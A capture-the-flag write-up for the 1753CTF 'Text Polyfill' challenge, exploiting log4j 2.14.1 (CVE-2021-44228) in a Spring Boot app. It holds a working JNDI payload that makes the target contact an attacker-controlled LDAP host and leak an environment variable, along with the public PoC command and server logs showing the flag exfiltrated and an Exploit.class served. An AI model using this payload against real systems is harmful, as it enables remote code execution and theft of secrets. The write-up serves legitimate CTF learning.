1753CTF
Text Polyfill
The challenge was a log4j vulnerable Java Spring Boot application.
The pom.xml file in the java maven project says:
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
That's the vulnerable version of log4j everyone was going crazy about. There's this poc exploit for log4j https://github.com/kozmer/log4j-shell-poc.
I ran this command on my VPS. I replaced its IP with 123.123.123.123.
~/ctf/log4j/log4j-shell-poc$ python3 poc.py --userip 123.123.123.123 --webport 8005 --lport 9001
The flag was an env variable. I submitted ${jndi:ldap://123.123.123.123:1389/${env:flag}} as the text with an image that I corrupted by just typing in random letters in burpsuite in the middle of the image bytes until I got the right kind of error in the java code for it to log that submitted text and execute the jndi ldap request. Yes, I fuzzed the PNG by hand, but it worked!
And the flag showed up in the terminal of the VPS
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://123.123.123.123:1389/a}
[+] Starting Webserver on port 8005 http://0.0.0.0:8005
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:39:30] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -